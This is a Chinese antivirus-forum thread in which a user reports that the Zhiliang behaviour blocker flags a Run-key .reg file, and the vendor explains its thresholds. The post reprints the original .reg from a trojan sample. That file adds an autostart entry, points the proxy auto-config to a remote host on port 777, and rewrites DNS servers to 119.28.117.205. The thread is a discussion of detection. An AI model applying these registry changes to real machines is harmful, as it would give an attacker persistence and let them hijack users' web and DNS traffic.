搜索
查看: 1076|回复: 7
收起左侧

[智量] 主防的“神奇”误报

[复制链接]
swizzer
发表于 6 天前 | 显示全部楼层 |阅读模式
本帖最后由 swizzer 于 2020-10-15 23:42 编辑
  1. Windows Registry Editor Version 5.00

  2. [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
  3. "dk"="C:\\Program File\\alllh\\au.exe"
复制代码



把这一段文本保存为reg后双击,智量主防识别为WIBD:HEUR.Trojan.KA;
若把其中把File改为Files则不报?
@智量官方


相关截图:


难道模型该调整了?




------------------------------------

本reg的最初面貌:(来自@落华无痕 提供的sf白加黑木马)
  1. Windows Registry Editor Version 5.00

  2. [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
  3. "DX报错服务"="D:\\$aa\\allilh\\allilhzu.exe"

  4. [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
  5. "IE5_UA_Backup_Flag"="5.0"
  6. "User Agent"="Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
  7. "EmailName"="User@"
  8. "PrivDiscUiShown"=dword:00000001
  9. "EnableHttp1_1"=dword:00000001
  10. "WarnOnIntranet"=dword:00000001
  11. "MimeExclusionListForCache"="multipart/mixed multipart/x-mixed-replace multipart/x-byteranges "
  12. "AutoConfigProxy"="wininet.dll"
  13. "UseSchannelDirectly"=hex:01,00,00,00
  14. "DisableCachingOfSSLPages"=dword:00000000
  15. "WarnonZoneCrossing"=dword:00000000
  16. "CertificateRevocation"=dword:00000001
  17. "WarnOnPost"=hex:01,00,00,00
  18. "UrlEncoding"=dword:00000000
  19. "SecureProtocols"=dword:00000a80
  20. "PrivacyAdvanced"=dword:00000000
  21. "EnableNegotiate"=dword:00000001
  22. "MigrateProxy"=dword:00000001
  23. "ProxyEnable"=dword:00000000
  24. "AutoConfigURL"="http://hetiancheng.sn.cn:777/"

  25. [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]

  26. "DefaultConnectionSettings"=hex:46,00,00,00,08,00,00,00,05,00,00,00,00,00,00,00,00,00,00,00,22,00,00,00,68,74,74,70,3A,2F,2F,68,65,74,69,61,6E,63,68,65,6E,67,2E,73,6E,2E,63,6E,3A,37,37,37,2F,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00

  27. "SavedLegacySettings"=hex:46,00,00,00,0e,00,00,00,05,00,00,00,00,00,00,00,00,00,00,00,22,00,00,00,68,74,74,70,3A,2F,2F,68,65,74,69,61,6E,63,68,65,6E,67,2E,73,6E,2E,63,6E,3A,37,37,37,2F,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00


  28. [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{6142CFD7-29A4-45B8-B72F-ACF97FB71AF5}]
  29. "NameServer"="119.28.117.205,114.114.114.114"
  30. [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{622CA10C-0B29-46A7-BE8A-420CE93BD16B}]
  31. "NameServer"="119.28.117.205,114.114.114.114"
  32. [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}]
  33. "NameServer"="119.28.117.205,114.114.114.114"
  34. [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{FE7A2601-0D55-40CF-B70E-405485F7E1CC}]
  35. "NameServer"="119.28.117.205,114.114.114.114"
复制代码




智量官方
发表于 5 天前 | 显示全部楼层
因为系统本身并不存在Program File这个目录,明显是伪造的, 所以很容易就达到主防报毒阙值
而Program Files这个目录是真实存在的用于安装软件,并且往这个目录写入文件是需要管理员权限的,所以主防阙值会高一些。
swizzer
 楼主| 发表于 5 天前 | 显示全部楼层
本帖最后由 swizzer 于 2020-10-16 23:15 编辑
智量官方 发表于 2020-10-16 10:27
因为系统本身并不存在Program File这个目录,明显是伪造的, 所以很容易就达到主防报毒阙值
而Program File ...

嗯,这一点我是清楚的。

不过在我这里,那个文件夹就算不是Program File(也就是官人所说的有伪造嫌疑的名称),而是其他名称,比如$aa(就像原来reg文件的那样,这算正常名称吧),主防同样报毒哦~

我只是在帖子里借一个略显极端的例子说明一下主防的阈值是多么“微妙”

换句话说,这样的主防阈值未免也太高了···对绿化软件很可能造成误杀的

况且真就靠这样的注册表内容就判为恶意也略显武断,不是吗?
------------------------------------------------------------------
另外,主防似乎还会在OllyDbg进行“attach”操作时将其识别为WIBD:HEUR.Injector.E···从用户界面多次上报也无用···不知官方那里有无此情况

@智量官方

αdmin
发表于 4 天前 | 显示全部楼层
swizzer 发表于 2020-10-16 22:21
嗯,这一点我是清楚的。

不过在我这里,那个文件夹就算不是Program File(也就是官人所说的有伪造嫌疑 ...

因为注入了其它程序呗
智量官方
发表于 4 天前 | 显示全部楼层
swizzer 发表于 2020-10-16 22:21
嗯,这一点我是清楚的。

不过在我这里,那个文件夹就算不是Program File(也就是官人所说的有伪造嫌疑 ...

1. 绿化软件是很少会这样添加启动项目的哦,这个东西看起来有些武断。但是从我们观察的情况看,基本没有正规软件使用这种方法添加自启动.

2. Ollydbg调试的时候会注入被调试程序,我们一般用OllyIce还没观察到这种情况,麻烦将你的Ollydbg压缩后发到virus@wisevector.com 我们分析无毒后会加白,谢谢.
computero
发表于 4 天前 | 显示全部楼层
智量官方 发表于 2020-10-17 17:45
1. 绿化软件是很少会这样添加启动项目的哦,这个东西看起来有些武断。但是从我们观察的情况看,基本没有 ...

WIN7系统玩腾讯的御龙在天也会报毒,醉了,你们自己测试吧
智量官方
发表于 3 天前 | 显示全部楼层
computero 发表于 2020-10-17 18:01
WIN7系统玩腾讯的御龙在天也会报毒,醉了,你们自己测试吧

你好,请问是否能提供智量日志?是静态扫描还是主防报毒?
computero
发表于 3 天前 | 显示全部楼层
智量官方 发表于 2020-10-18 19:03
你好,请问是否能提供智量日志?是静态扫描还是主防报毒?

自己用WIN7下载一个御龙在天就知道了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 晋ICP备20004298号-1 ) GMT+8, 2020-10-21 12:48 , Processed in 0.120102 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表